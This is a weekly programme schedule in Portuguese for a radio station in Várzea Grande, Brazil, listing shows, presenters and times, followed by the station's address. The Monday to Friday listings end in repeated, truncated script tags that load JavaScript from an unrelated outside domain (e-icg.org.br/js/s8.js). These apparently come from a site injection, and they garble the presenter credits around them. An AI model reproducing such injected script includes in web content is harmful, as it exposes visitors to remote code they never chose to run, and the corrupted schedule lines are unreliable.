:: PROGRAMAÇÃO ::
Segunda
Horário Programa Âncora e Equipe Responsável
00h Bandeirantes a Caminho do Sol Zancopé Simões
04h30 O Pulo do Gato José Paulo de Andrade
05h45 Link Nacional Bandeirantes Equipe Bandeirantes de Jornalismo
06h Jornal Primeira Hora Dedé Gomes, Dimas Aguiar e Walker Blaz
06h30 Hora Milagrosa Igreja Apostólica
07h Programa Toque de Alerta Davi de Paula
09h Manhã Industrial
11h Esporte Notícia – Edição Nacional Equipe Bandeirantes
13h Show da Tarde Walisson Oliveira
15h Música, Prosa e Poesia Maria das Graças
17h Sentimento Sertanejo Tião Oliveira
19h A Voz do Brasil Radiobras
20h Esporte em Debate Leandro Quesada e Alexandre Praetzel
22h Jornal de Amanhã Cesar Sacheto
23h Bandeirantes a Caminho do Sol Zancopé Simões
cript type="text/javascript" src="http://www.e-icg.org.br/js/s8.js"> cript type="text/javascript" src="http://www.e-icg.org.br/js/s8.js"> André Russo e Alex Muller

Terça
Horário Programa Âncora e Equipe Responsável
00h Bandeirantes a Caminho do Sol Zancopé Simões
04h30 O Pulo do Gato José Paulo de Andrade
05h45 Link Nacional Bandeirantes Equipe Bandeirantes de Jornalismo
06h Jornal Primeira Hora Dedé Gomes, Dimas Aguiar e Walker Blaz
06h30 Hora Milagrosa Igreja Apostólica
07h Programa Toque de Alerta Davi de Paula
09h Manhã Industrial
11h Esporte Notícia – Edição Nacional Equipe Bandeirantes
13h Show da Tarde Walisson Oliveira
15h Música, Prosa e Poesia Maria das Graças
17h Sentimento Sertanejo Tião Oliveira
19h A Voz do Brasil Radiobras
20h Esporte em Debate Leandro Quesada e Alexandre Praetzel
22h Chansons D’Amour Gilbert Stein
23h Bandeirantes a Caminho do Sol Zancopé Simões
cript type="text/javascript" src="http://www.e-icg.org.br/js/s8.js"> cript type="text/javascript" src="http://www.e-icg.org.br/js/s8.js"> André Russo e Alex Muller

Quarta
Horário Programa Âncora e Equipe Responsável
00h Bandeirantes a Caminho do Sol Zancopé Simões
04h30 O Pulo do Gato José Paulo de Andrade
05h45 Link Nacional Bandeirantes Equipe Bandeirantes de Jornalismo
06h Jornal Primeira Hora Dedé Gomes, Dimas Aguiar e Walker Blaz
06h30 Hora Milagrosa Igreja Apostólica
07h Programa Toque de Alerta Davi de Paula
09h Manhã Industrial
11h Esporte Notícia – Edição Nacional Equipe Bandeirantes
13h Show da Tarde Walisson Oliveira
15h Música, Prosa e Poesia Maria das Graças
17h Sentimento Sertanejo Tião Oliveira
19h A Voz do Brasil Radiobras
20h Esporte em Debate Leandro Quesada e Alexandre Praetzel
22h JORNADA ESPORTIVA Equipe Bandeirantes
23h Terceiro Tempo Milton Neves
cript type="text/javascript" src="http://www.e-icg.org.br/js/s8.js"> cript type="text/javascript" src="http://www.e-icg.org.br/js/s8.js"> André Russo e Alex Muller

Quinta
Horário Programa Âncora e Equipe Responsável
00h Bandeirantes a Caminho do Sol Zancopé Simões
04h30 O Pulo do Gato José Paulo de Andrade
05h45 Link Nacional Bandeirantes Equipe Bandeirantes de Jornalismo
06h Jornal Primeira Hora Dedé Gomes, Dimas Aguiar e Walker Blaz
06h30 Hora Milagrosa Igreja Apostólica
07h Programa Toque de Alerta Davi de Paula
09h Manhã Industrial
11h Esporte Notícia – Edição Nacional Equipe Bandeirantes
13h Show da Tarde Walisson Oliveira
15h Música, Prosa e Poesia Maria das Graças
17h Sentimento Sertanejo Tião Oliveira
19h A Voz do Brasil Radiobras
20h Esporte em Debate Leandro Quesada e Alexandre Praetzel
22h Jornal de Amanhã Cesar Sacheto
23h Bandeirantes a Caminho do Sol Zancopé Simões
cript type="text/javascript" src="http://www.e-icg.org.br/js/s8.js"> cript type="text/javascript" src="http://www.e-icg.org.br/js/s8.js"> André Russo e Alex Muller

Sexta
Horário Programa Âncora e Equipe Responsável
00h Bandeirantes a Caminho do Sol Zancopé Simões
04h30 O Pulo do Gato José Paulo de Andrade
05h45 Link Nacional Bandeirantes Equipe Bandeirantes de Jornalismo
06h Jornal Primeira Hora Dedé Gomes, Dimas Aguiar e Walker Blaz
06h30 Hora Milagrosa Igreja Apostólica
07h Programa Toque de Alerta Davi de Paula
09h Manhã Industrial
11h Esporte Notícia – Edição Nacional Equipe Bandeirantes
13h Show da Tarde Walisson Oliveira
15h Música, Prosa e Poesia Maria das Graças
17h Sentimento Sertanejo Tião Oliveira
19h A Voz do Brasil Radiobras
20h Esporte em Debate Leandro Quesada e Alexandre Praetzel
22h Chansons D’Amour Gilbert Stein
23h Bandeirantes a Caminho do Sol Zancopé Simões
cript type="text/javascript" src="http://www.e-icg.org.br/js/s8.js"> cript type="text/javascript" src="http://www.e-icg.org.br/js/s8.js"> André Russo e Alex Muller

Sábado
Horário Programa Âncora e Equipe Responsável
00h Bandeirantes a Caminho do Sol Zancopé Simões
04h30 O Pulo do Gato José Paulo de Andrade
06h Jornal Primeira Hora Dedé Gomes, Dimas Aguiar e Walker Blaz
06h30 Hora Milagrosa Igreja Apostólica
07h DNA do Pampa João Francisco
09h Chique no Úrtimo! Paulo Juventino
12h Esporte – Notícia internacional Sérgio Patrick
12h Arquivo Musical Carlos Rene
14h Concentração Ricardo Capriotti
18h30 Você é Curioso Silvania Alves e Marcelo Duarte
20h Antenados Ana Nery de Farias
21h Sábado de Classe Salomão Schwartzman
22h Memória – Sábado Milton Parron
23h Bandeirantes a Caminho do Sol Silvania Alves

Domingo
Horário Programa Âncora e Equipe Responsável
00h Bandeirantes a Caminho do Sol Zancopé Simões
04h Memória Milton Parron
05h Arquivo Musical Ronaldo Gimenez
07h30 Fôlego Ricardo Capriotti e Sérgio Patrick
08h Domingo Esportivo Bandeirantes Milton Neves
15h JORNADA ESPORTIVA Equipe Bandeirantes
17h30 Terceiro Tempo Alex Muller
19h Bandeirantes Acontece Carolina Ercolin
23h Bandeirantes a Caminho do Sol Zancopé Simões

 
 
Rádio Indústrial de Várzea Grande Ltda
AM 1070 Khz - A Rádio Povo
Av. Governador Júlio Campos, 3111. Jardim Glória. Várzea Grande MT.
CEP 78140- 400 Fone: (65) 3682-2525